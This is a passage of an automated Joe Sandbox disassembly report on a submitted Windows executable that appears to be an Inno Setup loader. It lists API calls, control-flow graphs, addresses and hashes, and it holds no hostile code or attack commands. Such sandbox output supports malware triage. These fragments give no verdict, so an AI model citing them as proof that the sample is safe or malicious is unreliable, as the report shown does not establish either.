                                                                                                    • API String ID: 3256987805-3653653586
                                                                                                    • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                    • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                                                    • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                                                    • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • SetLastError.KERNEL32 ref: 0040AAC1
                                                                                                      • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02262480), ref: 0040966C
                                                                                                    • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                    • SetWindowLongA.USER32(000103F2,000000FC,00409960), ref: 0040AB15
                                                                                                    • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                    • DestroyWindow.USER32(000103F2,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$ErrorLast$CreateDestroyDirectoryLongRemove
                                                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                    • API String ID: 3757039580-3001827809
                                                                                                    • Opcode ID: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                    • Instruction ID: 81987b3bab642c92fe87a7372e0454594c4b8fe140ce311e0f93b1eeebf6ab37
                                                                                                    • Opcode Fuzzy Hash: 7bc9c0c8e9dfd2478b94306391eafe1fb51b7566d8199cdbb2b2653dcbc3d95c
                                                                                                    • Instruction Fuzzy Hash: 25412E70604204DBDB10EBA9EE89B9E37A5EB44304F10467FF510B72E2D7B89855CB9D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090C4
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,0040A62C), ref: 004090DE
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                    • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                                                    • API String ID: 1646373207-2130885113
                                                                                                    • Opcode ID: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                    • Instruction ID: 214dda5481ef482ebe311b1329301f35405b1013d97e3062c17ffb2c8286d57d
                                                                                                    • Opcode Fuzzy Hash: 0414f1d66f28dc470df4633e5994336701384173b3f6f66b470f3ad827f759f7
                                                                                                    • Instruction Fuzzy Hash: 21017C70748342AEFB00BB76DD4AB163A68E785704F60457BF640BA2D3DABD4C04D66E

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040AAFE
                                                                                                    • SetWindowLongA.USER32(000103F2,000000FC,00409960), ref: 0040AB15
                                                                                                      • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040AB86,?), ref: 00406B94
                                                                                                      • Part of subcall function 004099EC: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                      • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8,00000000), ref: 00409A70
                                                                                                      • Part of subcall function 004099EC: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                      • Part of subcall function 004099EC: GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                      • Part of subcall function 004099EC: CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8), ref: 00409AA4
                                                                                                    • RemoveDirectoryA.KERNEL32(00000000,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC01
                                                                                                    • DestroyWindow.USER32(000103F2,0040AC54,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040AC15
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Window$CloseCreateHandleProcess$CodeCommandDestroyDirectoryExitLineLongMultipleObjectsRemoveWait
                                                                                                    • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                                                    • API String ID: 3586484885-3001827809
                                                                                                    • Opcode ID: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                    • Instruction ID: d3376fcde1141b4290a3dca450fc2844fa47922897975e075ebf06e3b6db64eb
                                                                                                    • Opcode Fuzzy Hash: c367800830601d7b7bb1e4b9cc729c69669d466ec6c890b8506752b9ad64910a
                                                                                                    • Instruction Fuzzy Hash: 77411A71604204DFD714EBA9EE85B5A37B5EB48304F20427BF500BB2E1D7B8A855CB9D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8,00000000,00409ABF), ref: 00409A5C
                                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8,00000000), ref: 00409A70
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00409A89
                                                                                                    • GetExitCodeProcess.KERNEL32(?,0040B244), ref: 00409A9B
                                                                                                    • CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409AE4,02262480,00409AD8), ref: 00409AA4
                                                                                                      • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B244,?,02262480), ref: 0040966C
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseHandleProcess$CodeCreateErrorExitLastMultipleObjectsWait
                                                                                                    • String ID: D
                                                                                                    • API String ID: 3356880605-2746444292
                                                                                                    • Opcode ID: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                    • Instruction ID: b58d0f6e2b8975977e6c7b71aada5392bea55c03070ce9fad3dcef5aa6d4018a
                                                                                                    • Opcode Fuzzy Hash: aadf6f075de5bdb3c28d757ddccd10dd30f6bbfdbbad62eb54c24073370c977f
                                                                                                    • Instruction Fuzzy Hash: EE1142B16402486EDB00EBE6CC42F9EB7ACEF49714F50013BB604F72C6DA785D048A69

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 136 401918-40193a RtlInitializeCriticalSection 137 401946-40197c call 4012dc * 3 LocalAlloc 136->137 138 40193c-401941 RtlEnterCriticalSection 136->138 145 4019ad-4019c1 137->145 146 40197e 137->146 138->137 150 4019c3-4019c8 RtlLeaveCriticalSection 145->150 151 4019cd 145->151 147 401983-401995 146->147 147->147 149 401997-4019a6 147->149 149->145 150->151
                                                                                                    APIs
                                                                                                    • RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                    • RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                    • String ID:
                                                                                                    • API String ID: 730355536-0
                                                                                                    • Opcode ID: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                    • Instruction ID: 093a8b970c40f4dda7bd37408b901a2e20e4e29fb74a5496b56404d4d89a3717
                                                                                                    • Opcode Fuzzy Hash: 38709c719971e1168baf9cdc3c67f999ad3db3ab521e9349fb3b390a12b3c6f3
                                                                                                    • Instruction Fuzzy Hash: CC0161B0684240DEE715ABA999E6B353AA4E786744F10427FF080F62F2C67C4450CB9D

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: .tmp$y@
                                                                                                    • API String ID: 2030045667-2396523267
                                                                                                    • Opcode ID: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                    • Instruction ID: 5e9257013af3d55ef2b6e359c41f87f67318ae2a4e6dbf07461b5d8c6de74657
                                                                                                    • Opcode Fuzzy Hash: 55a53fbd7ad7285035f8ab2cde1915fb146aa3dc543cd9b52406218d685c1c98
                                                                                                    • Instruction Fuzzy Hash: 3B41C030704200CFD311EF25DED1A1A77A5EB49304B214A3AF804B73E1CAB9AC11CBAD

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • MessageBoxA.USER32(00000000,00000000,00000000,00000024), ref: 0040A878
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Message
                                                                                                    • String ID: .tmp$y@
                                                                                                    • API String ID: 2030045667-2396523267
                                                                                                    • Opcode ID: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                    • Instruction ID: 95bba075cf9db07042691c1556ef0613dbe482a65a3614fff4d0ead14828e6f7
                                                                                                    • Opcode Fuzzy Hash: 4e131503fe38447772e4e2294cf5373b7e2007f9fac8d76d0a71823c743fc64d
                                                                                                    • Instruction Fuzzy Hash: E341BE30700200DFC711EF65DED2A1A77A5EB49304B104A3AF804B73E2CAB9AC01CBAD

                                                                                                    Control-flow Graph

                                                                                                    APIs
                                                                                                    • CreateDirectoryA.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 00409376
                                                                                                    • GetLastError.KERNEL32(00000000,00000000,?,00000000,0040941F,?,?,?,?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040937F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CreateDirectoryErrorLast
                                                                                                    • String ID: .tmp
                                                                                                    • API String ID: 1375471231-2986845003
                                                                                                    • Opcode ID: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                    • Instruction ID: b240cf9bc22f775501a2d99da134be40bb2f76fb21a7d6e050461713caae6e8b
                                                                                                    • Opcode Fuzzy Hash: 1c7982c9535877cc809d76a2290e1ec991a7408e90ad789d49a53b04ffd62ed2
                                                                                                    • Instruction Fuzzy Hash: 9E216774A00208ABDB05EFA1C8429DFB7B8EF88304F50457BE901B73C2DA3C9E058A65

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 342 407749-40774a 343 4076dc-4076e6 WriteFile 342->343 344 40774c-40776f 342->344 346 4076e8-4076ea call 40748c 343->346 347 4076ef-4076f2 343->347 345 407770-407785 344->345 348 407787 345->348 349 4077f9 345->349 346->347 351 407700-407704 347->351 352 4076f4-4076fb call 4073ec 347->352 353 40778a-40778f 348->353 354 4077fd-407802 348->354 355 40783b-40783d 349->355 356 4077fb 349->356 352->351 360 407803-407819 353->360 362 407791-407792 353->362 354->360 358 407841-407843 355->358 356->354 361 40785b-40785c 358->361 360->361 371 40781b 360->371 363 4078d6-4078eb call 407890 InterlockedExchange 361->363 364 40785e-40788c 361->364 365 407724-407741 362->365 366 407794-4077b4 362->366 384 407912-407917 363->384 385 4078ed-407910 363->385 381 407820-407823 364->381 382 407890-407893 364->382 370 4077b5 365->370 372 407743 365->372 366->370 375 4077b6-4077b7 370->375 376 4077f7-4077f8 370->376 377 40781e-40781f 371->377 378 407746-407747 372->378 379 4077b9 372->379 375->379 376->349 377->381 378->342 380 4077bb-4077cd 378->380 379->380 380->358 386 4077cf-4077d4 380->386 387 407824 381->387 388 407898 381->388 382->388 385->384 385->385 386->355 392 4077d6-4077de 386->392 390 407825 387->390 391 40789a 387->391 388->391 393 407896-407897 390->393 394 407826-40782d 390->394 395 40789f 391->395 392->345 404 4077e0 392->404 393->388 396 4078a1 394->396 398 40782f 394->398 395->396 402 4078a3 396->402 403 4078ac 396->403 400 407832-407833 398->400 401 4078a5-4078aa 398->401 400->355 400->377 405 4078ae-4078af 401->405 402->401 403->405 404->376 405->395 406 4078b1-4078bd 405->406 406->388 407 4078bf-4078c0 406->407
                                                                                                    APIs
                                                                                                    • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 004076DF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: FileWrite
                                                                                                    • String ID:
                                                                                                    • API String ID: 3934441357-0
                                                                                                    • Opcode ID: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                    • Instruction ID: 20d0a63744b7af467993d3e8aec565234b7be2d060ba20bf9fd199bb98bd5a4e
                                                                                                    • Opcode Fuzzy Hash: 43d3196ec1ce5242573e8f450cfa6a0a1bc6604aabb0088ea34051851cbbaa4a
                                                                                                    • Instruction Fuzzy Hash: 8251D12294D2910FC7126B7849685A53FE0FE5331132E92FBC5C1AB1A3D27CA847D35B

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 408 401fd4-401fe6 409 401fe8 call 401918 408->409 410 401ffb-402010 408->410 414 401fed-401fef 409->414 412 402012-402017 RtlEnterCriticalSection 410->412 413 40201c-402025 410->413 412->413 415 402027 413->415 416 40202c-402032 413->416 414->410 417 401ff1-401ff6 414->417 415->416 418 402038-40203c 416->418 419 4020cb-4020d1 416->419 420 40214f-402158 417->420 423 402041-402050 418->423 424 40203e 418->424 421 4020d3-4020e0 419->421 422 40211d-40211f call 401ee0 419->422 427 4020e2-4020ea 421->427 428 4020ef-40211b call 402f54 421->428 431 402124-40213b 422->431 423->419 425 402052-402060 423->425 424->423 429 402062-402066 425->429 430 40207c-402080 425->430 427->428 428->420 434 402068 429->434 435 40206b-40207a 429->435 437 402082 430->437 438 402085-4020a0 430->438 440 402147 431->440 441 40213d-402142 RtlLeaveCriticalSection 431->441 434->435 439 4020a2-4020c6 call 402f54 435->439 437->438 438->439 439->420 441->440
                                                                                                    APIs
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0040C41C,00000000,00402148), ref: 00402017
                                                                                                      • Part of subcall function 00401918: RtlInitializeCriticalSection.KERNEL32(0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040192E
                                                                                                      • Part of subcall function 00401918: RtlEnterCriticalSection.KERNEL32(0040C41C,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 00401941
                                                                                                      • Part of subcall function 00401918: LocalAlloc.KERNEL32(00000000,00000FF8,0040C41C,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 0040196B
                                                                                                      • Part of subcall function 00401918: RtlLeaveCriticalSection.KERNEL32(0040C41C,004019D5,00000000,004019CE,?,?,0040217A,?,?,?,?,?,00401B95,00401DBB,00401DE0), ref: 004019C8
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$Enter$AllocInitializeLeaveLocal
                                                                                                    • String ID:
                                                                                                    • API String ID: 296031713-0
                                                                                                    • Opcode ID: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                    • Instruction ID: b272be6629c35a549fc4f1c5a19e6e0df2414f51bb24a7fd7fb800939d1160d0
                                                                                                    • Opcode Fuzzy Hash: e41243de7c80276a36dcdd2c2c0e451bb1a6f3055e5ddec7aea90b49354f7273
                                                                                                    • Instruction Fuzzy Hash: D4419CB2A40711DFDB108F69DEC562A77A0FB58314B25837AD984B73E1D378A842CB48

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 444 406fa0-406ff3 SetErrorMode call 403414 LoadLibraryA
                                                                                                    APIs
                                                                                                    • SetErrorMode.KERNEL32(00008000), ref: 00406FAA
                                                                                                    • LoadLibraryA.KERNEL32(00000000,00000000,00406FF4,?,00000000,00407012,?,00008000), ref: 00406FD9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLibraryLoadMode
                                                                                                    • String ID:
                                                                                                    • API String ID: 2987862817-0
                                                                                                    • Opcode ID: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                    • Instruction ID: 292e1fc4e19851716b0ab93d2d43454b233f1d25ff8a05a0d03104374ea2dcbc
                                                                                                    • Opcode Fuzzy Hash: 9b48b29771c4fc6652b627c4d055133170331230f079557c80f3f4e2880abe46
                                                                                                    • Instruction Fuzzy Hash: D6F08270A14704BEDB129FB68C5282ABBECEB4DB0475349BAF914A26D2E53C5C209568
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNEL32(?,?,?,00000000), ref: 0040768B
                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000), ref: 00407693
                                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022603AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorLast$FilePointer
                                                                                                    • String ID:
                                                                                                    • API String ID: 1156039329-0
                                                                                                    • Opcode ID: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                    • Instruction ID: 64daf3b7b2b4cd691f255a674f922558070816022eb0a012369b73df1192a31e
                                                                                                    • Opcode Fuzzy Hash: cf8b3d77442686d6cce32677ffa2556d95a4d660bd32a6059a32509021572d83
                                                                                                    • Instruction Fuzzy Hash: B2E092766081016FD600D55EC881B9B37DCDFC5364F104536B654EB2D1D679EC108776

                                                                                                    Control-flow Graph

                                                                                                    • Executed
                                                                                                    • Not Executed
                                                                                                    control_flow_graph 448 40762c-40764a ReadFile 449 407663-40766a 448->449 450 40764c-407650 448->450 451 407652-40765a GetLastError 450->451 452 40765c-40765e call 40748c 450->452 451->449 451->452 452->449
                                                                                                    APIs
                                                                                                    • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 00407643
                                                                                                    • GetLastError.KERNEL32(?,?,?,?,00000000), ref: 00407652
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614398601.000000000040B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                    • Associated: 00000000.00000002.2614430779.0000000000411000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_0_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: ErrorFileLastRead
                                                                                                    • String ID:
                                                                                                    • API String ID: 1948546556-0
                                                                                                    • Opcode ID: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                    • Instruction ID: e2f452503b48da12a69c10a9d1416f2aa512a4714c212e67fea7d8588799396e
                                                                                                    • Opcode Fuzzy Hash: 1b4aea639ae4b78e93b9ef79541d7064bf1f98a27d237b51b731e51654b8bdcb
                                                                                                    • Instruction Fuzzy Hash: 69E012A1A081106ADB24A66E9CC5F6B6BDCCBC5724F14457BF504DB382D678DC0487BB
                                                                                                    APIs
                                                                                                    • SetFilePointer.KERNEL32(?,00000000,?,00000001), ref: 004075DB
                                                                                                    • GetLastError.KERNEL32(?,00000000,?,00000001), ref: 004075E7
                                                                                                      • Part of subcall function 0040748C: GetLastError.KERNEL32(0040738C,0040752A,?,?,022603AC,?,0040A69B,00000001,00000000,00000002,00000000,0040AC92,?,00000000,0040ACC9), ref: 0040748F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000000.00000002.2614373891.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000000.00000002.2614346539.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
